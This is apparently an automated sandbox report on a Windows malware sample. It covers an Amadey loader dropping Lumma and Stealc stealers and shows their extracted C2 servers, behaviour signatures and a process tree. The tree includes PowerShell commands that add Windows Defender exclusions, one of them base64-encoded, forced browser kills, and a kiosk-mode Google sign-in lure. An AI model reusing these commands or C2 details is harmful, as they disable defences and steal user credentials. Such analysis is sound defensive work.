Analysis

  • max time kernel
    91s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    19-12-2024 23:09

General

  • Target

    file.exe

  • Size

    2.9MB

  • MD5

    8c724813b4468960543fcbcb4635f74f

  • SHA1

    23693d84c1441a3edc77686c5a613f747ccff8a6

  • SHA256

    4cc2d946c5c43426f509193cb5bee665f59f46c795c4da045d3b5940d660e6d4

  • SHA512

    c10f32547cd5a5921fa826eb11d437887b13b75ecd6d4a284288e12498e9d5406a779fb2fa2632d38412b6310dc53fca530e59dc3b80db76165431b2cf405cfa

  • SSDEEP

    49152:Zr515k/dk6Cw71eUMEdzK8Epe8C4IYilUBEhfqluQpq+K:5515k1klQ19LdzK8EpHICEc0aK

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 63 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 15 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 39 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 60 IoCs
  • Suspicious use of SendNotifyMessage 55 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1336
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2408
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2904
          • C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe
            "C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1160
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\uddlfcwuy"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:932
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1976
          • C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe
            "C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1792
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"
              5⤵
              • Enumerates connected drives
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:1700
          • C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe
            "C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"
            4⤵
            • Executes dropped EXE
            PID:2436
          • C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe
            "C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe
              "C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:2932
          • C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe
            "C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"
            4⤵
            • Drops startup file
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2872
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUA
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:932
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 1016
              5⤵
              • Loads dropped DLL
              • Program crash
              PID:1420
          • C:\Users\Admin\AppData\Local\Temp\1017975001\8495e03886.exe
            "C:\Users\Admin\AppData\Local\Temp\1017975001\8495e03886.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:6412
            • C:\Users\Admin\AppData\Local\Temp\1017975001\8495e03886.exe
              "C:\Users\Admin\AppData\Local\Temp\1017975001\8495e03886.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:6796
          • C:\Users\Admin\AppData\Local\Temp\1017976001\16280095a8.exe
            "C:\Users\Admin\AppData\Local\Temp\1017976001\16280095a8.exe"
            4⤵
            • Executes dropped EXE
            PID:6760
          • C:\Users\Admin\AppData\Local\Temp\1017977001\bf04c91419.exe
            "C:\Users\Admin\AppData\Local\Temp\1017977001\bf04c91419.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:6940
          • C:\Users\Admin\AppData\Local\Temp\1017978001\e065b6d504.exe
            "C:\Users\Admin\AppData\Local\Temp\1017978001\e065b6d504.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2676
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\emcwi"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2336
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:376
          • C:\Users\Admin\AppData\Local\Temp\1017979001\a6ef9e6509.exe
            "C:\Users\Admin\AppData\Local\Temp\1017979001\a6ef9e6509.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1692
          • C:\Users\Admin\AppData\Local\Temp\1017980001\138f80372c.exe
            "C:\Users\Admin\AppData\Local\Temp\1017980001\138f80372c.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:6192
          • C:\Users\Admin\AppData\Local\Temp\1017981001\d4c0ca19ed.exe
            "C:\Users\Admin\AppData\Local\Temp\1017981001\d4c0ca19ed.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:3440
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:3540
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:3936
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:4136
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:2384
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:1516
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              5⤵
                PID:756
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  6⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:2068
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.0.1454617224\1925539644" -parentBuildID 20221007134813 -prefsHandle 1196 -prefMapHandle 1188 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b81aeeef-0a8a-482b-834a-24aeff5b8693} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 1276 10ad9a58 gpu
                    7⤵
                      PID:3088
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.1.87731071\1086950990" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {47ed3977-7ef7-4359-93e5-ed3072edc289} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 1532 ee7958 socket
                      7⤵
                        PID:3284
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.2.1510283700\1264792519" -childID 1 -isForBrowser -prefsHandle 2160 -prefMapHandle 2156 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 780 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae532a8c-09a1-4489-b8b9-da0d1b47cadf} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 2172 196bb558 tab
                        7⤵
                          PID:3688
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.3.1729124759\590155709" -childID 2 -isForBrowser -prefsHandle 2876 -prefMapHandle 2872 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 780 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc09161e-0e9e-4707-9883-a4bc157c82b6} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 2888 e6ad58 tab
                          7⤵
                            PID:4916
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2068.4.276928805\2133667022" -parentBuildID 20221007134813 -prefsHandle 1276 -prefMapHandle 2364 -prefsLen 26356 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6a21c45-3cd8-4180-b7e5-a452006f6bcc} 2068 "\\.\pipe\gecko-crash-server-pipe.2068" 1196 1eeee458 gpu
                            7⤵
                              PID:6768
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM firefox.exe /T
                          5⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:3276
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM chrome.exe /T
                          5⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:6972
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM msedge.exe /T
                          5⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:1208
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM opera.exe /T
                          5⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:6864
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM brave.exe /T
                          5⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:1052
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          5⤵
                            PID:3944
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                              6⤵
                              • Checks processor information in registry
                              • Modifies registry class
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:4640
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4640.0.53700433\1065412647" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1188 -prefsLen 20904 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aeb3a9a3-0a5c-48bc-b023-9319cb877706} 4640 "\\.\pipe\gecko-crash-server-pipe.4640" 1320 44f9c58 gpu
                                7⤵
                                  PID:740
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4640.1.970058059\1652894162" -parentBuildID 20221007134813 -prefsHandle 1472 -prefMapHandle 1468 -prefsLen 21765 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f14684e-95a9-4442-9359-d2ebab45784f} 4640 "\\.\pipe\gecko-crash-server-pipe.4640" 1484 44fae58 socket
                                  7⤵
                                    PID:1964
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4640.2.1206813957\1391449321" -childID 1 -isForBrowser -prefsHandle 2028 -prefMapHandle 2044 -prefsLen 21803 -prefMapSize 233496 -jsInitHandle 780 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bfcb05b-73d3-4e11-aab1-37469db4323e} 4640 "\\.\pipe\gecko-crash-server-pipe.4640" 1968 19f38d58 tab
                                    7⤵
                                      PID:3868
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4640.3.853037082\967985149" -childID 2 -isForBrowser -prefsHandle 2824 -prefMapHandle 2820 -prefsLen 26216 -prefMapSize 233496 -jsInitHandle 780 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {43b1aa01-8d8f-4b92-84fc-4544b9e40dc8} 4640 "\\.\pipe\gecko-crash-server-pipe.4640" 2836 1c266d58 tab
                                      7⤵
                                        PID:3816
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM firefox.exe /T
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    PID:1640
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM chrome.exe /T
                                    5⤵
                                    • Kills process with taskkill
                                    PID:5548
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM msedge.exe /T
                                    5⤵
                                    • Kills process with taskkill
                                    PID:2432
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM opera.exe /T
                                    5⤵
                                    • Kills process with taskkill
                                    PID:3228
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM brave.exe /T
                                    5⤵
                                    • Kills process with taskkill
                                    PID:4228
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                    5⤵
                                      PID:2040
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                        6⤵
                                          PID:4696
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4696.0.1509667873\596164972" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 20904 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c1f85e5-726b-4550-af9c-4d2d8e038334} 4696 "\\.\pipe\gecko-crash-server-pipe.4696" 1288 134f6558 gpu
                                            7⤵
                                              PID:3852
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4696.1.496183435\847631278" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21765 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb2e1ce2-103e-4e61-943c-0ad192064a4f} 4696 "\\.\pipe\gecko-crash-server-pipe.4696" 1504 f74b58 socket
                                              7⤵
                                                PID:2852
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4696.2.1191918912\96448268" -childID 1 -isForBrowser -prefsHandle 2080 -prefMapHandle 2076 -prefsLen 21803 -prefMapSize 233496 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {19c124bb-3fa1-451b-b831-c1fa6012c93a} 4696 "\\.\pipe\gecko-crash-server-pipe.4696" 2092 19b2e758 tab
                                                7⤵
                                                  PID:5964
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4696.3.1059242536\2116595543" -childID 2 -isForBrowser -prefsHandle 2744 -prefMapHandle 2740 -prefsLen 26216 -prefMapSize 233496 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {27130a91-d47e-4bc2-a315-3adaa7d17c95} 4696 "\\.\pipe\gecko-crash-server-pipe.4696" 2756 1d533b58 tab
                                                  7⤵
                                                    PID:6428
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4696.4.1633253341\286572260" -childID 3 -isForBrowser -prefsHandle 3764 -prefMapHandle 1964 -prefsLen 26450 -prefMapSize 233496 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0da43f87-096f-42df-b0da-c6e67c7bb7cb} 4696 "\\.\pipe\gecko-crash-server-pipe.4696" 3776 f5db58 tab
                                                    7⤵
                                                      PID:4760
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4696.5.567976209\477389185" -childID 4 -isForBrowser -prefsHandle 3852 -prefMapHandle 3856 -prefsLen 26450 -prefMapSize 233496 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {69ccf187-c353-4044-acb5-f489c74bee14} 4696 "\\.\pipe\gecko-crash-server-pipe.4696" 3840 18cfac58 tab
                                                      7⤵
                                                        PID:5364
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4696.6.1320060762\1866408018" -childID 5 -isForBrowser -prefsHandle 4012 -prefMapHandle 4016 -prefsLen 26450 -prefMapSize 233496 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fbee3b9d-1a49-4223-b0f6-3afd81794cde} 4696 "\\.\pipe\gecko-crash-server-pipe.4696" 4000 18cfa058 tab
                                                        7⤵
                                                          PID:4544
                                                  • C:\Users\Admin\AppData\Local\Temp\1017982001\b1bc4bc79e.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1017982001\b1bc4bc79e.exe"
                                                    4⤵
                                                    • Modifies Windows Defender Real-time Protection settings
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Windows security modification
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2040
                                                  • C:\Users\Admin\AppData\Local\Temp\1017983001\761f096d36.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1017983001\761f096d36.exe"
                                                    4⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1712
                                                  • C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6244
                                                    • C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe"
                                                      5⤵
                                                        PID:6492
                                                      • C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe"
                                                        5⤵
                                                          PID:6140
                                                        • C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe"
                                                          5⤵
                                                            PID:6624
                                                          • C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1017984001\d32ad15baa.exe"
